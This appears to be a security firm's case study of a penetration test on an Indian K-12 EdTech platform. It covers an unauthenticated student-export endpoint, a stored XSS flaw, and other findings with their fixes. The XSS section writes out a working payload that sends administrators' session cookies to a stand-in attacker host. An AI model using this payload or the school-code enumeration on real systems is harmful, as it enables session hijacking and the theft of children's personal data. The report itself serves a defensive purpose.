Penetration Testing for an EdTech Platform Handling Student Data

Background

A Hyderabad-based EdTech platform providing online learning, assessment, and progress tracking for K-12 students engaged CyberneticsPlus for a penetration test. The platform had 2.1 million registered student accounts across India, with student data including age, school name, class, performance records, and parent contact information.

The driver: three state education boards were in discussions to use the platform for official curriculum delivery and assessment — each requiring a security audit report before signing agreements. The platform had no prior formal security assessment.

Scope:

• Student-facing web application and mobile API
• Teacher and school administrator portal
• Parent notification API
• Content management system (internal, used by curriculum team)

Key Findings

Critical: Mass Student Data Exposure via Unauthenticated API

Finding: During API endpoint enumeration, CyberneticsPlus discovered an undocumented endpoint: /api/v1/students/export?school_code={school_code}

The endpoint, originally built for a school bulk-import feature, was never removed after the feature was redesigned. It accepted a school code (4-digit numeric identifier) and returned a paginated export of all student records for that school — with no authentication required.

School codes were sequential and easily enumerable (tested codes 1001 through 1050, all returning valid school data).

Data exposed per request:

• Student name, age, class, section
• Parent/guardian name and mobile number
• School name and city
• Assessment scores and performance percentiles

Scope of exposure: Testing confirmed all 2.1 million student records were accessible via this endpoint by iterating school codes. The endpoint had been live for 14 months.

Immediate action: CyberneticsPlus notified the client’s CTO verbally within 2 hours of discovery. Endpoint was disabled within 4 hours. No evidence of prior exploitation found in server access logs (log retention was 30 days — could not confirm no access in earlier months).

Fix: Endpoint permanently removed. API audit conducted to identify other unauthenticated routes — 2 additional low-risk unauthenticated endpoints identified and secured.

Regulatory consideration: The client’s legal team assessed notification obligations under India’s Digital Personal Data Protection Act, 2023 (DPDPA). Decision: given the absence of confirmed exploitation evidence and the sensitivity of the data (no financial data, no government IDs), and given that the endpoint was disabled before any confirmed misuse, the client elected to document the incident internally and implement enhanced monitoring rather than formal notification. Legal counsel’s advice was that this met the DPDPA’s risk-proportionate approach.

Critical: Stored XSS in Teacher Portal — Session Hijacking Path

Finding: The teacher portal’s assignment description field accepted rich-text HTML content, which was rendered in the school administrator’s review dashboard without sanitisation. A teacher user could inject JavaScript that executed in an administrator’s browser session.

Exploitation scenario:

1. Teacher submits assignment with payload: <img src=x onerror="document.location='https://attacker.com/steal?c='+document.cookie">
2. School administrator reviews pending assignments → payload executes in their browser
3. Administrator session cookie stolen → attacker gains administrator access
4. Administrator can access all student records, teacher accounts, and school configuration for their school

Fix: Rich-text editor configured to strip script tags and event handlers (DOMPurify allowlist applied). Content Security Policy added to the administrator portal: Content-Security-Policy: default-src 'self'; script-src 'self'

High Findings (5)

• Parent portal: IDOR on child account data (parent A could view child records of parent B by modifying student_id parameter)
• Teacher portal: No rate limiting on student search endpoint (could be used to enumerate and download student records)
• Content management: Admin panel accessible without IP restriction or MFA
• Mobile API: JWT tokens not invalidated on logout (30-day tokens remained valid after logout)
• Infrastructure: 3 EC2 instances with port 22 open to 0.0.0.0/0

Medium Findings (9)

• Missing security headers (CSP, X-Frame-Options, HSTS) on student-facing application
• Verbose error messages exposing database table names
• Student profile photos stored in a public S3 bucket (no sensitive data, but photos of minors publicly accessible)
• Password reset tokens valid for 24 hours (should be 1 hour)
• Missing input validation on assignment submission (could upload malicious file types)
• API documentation accessible without authentication (exposed internal endpoint structure)
• No WAF on student-facing application
• Outdated dependencies (3 npm packages with known CVEs)
• No monitoring or alerting on suspicious access patterns

Remediation and Outcome

Critical findings: Both resolved within 72 hours of report delivery (endpoint removed, XSS patched) High findings: All 5 resolved within 10 business days Medium findings: 7 of 9 resolved within 30 days; 2 deferred (API docs access, dependency updates — both on roadmap with defined timelines)

CyberneticsPlus provided the client with a remediation certificate and a clean retest report covering all critical and high findings.

State education board partnerships:

• Two of three boards reviewed the penetration test report and retest evidence — both proceeded with partnership agreements
• Third board requested an additional security questionnaire response from CyberneticsPlus — completed within 3 business days — and subsequently signed the agreement

The EdTech platform now conducts semi-annual penetration tests and has implemented a vulnerability disclosure programme (VDP) for responsible reporting of future security issues.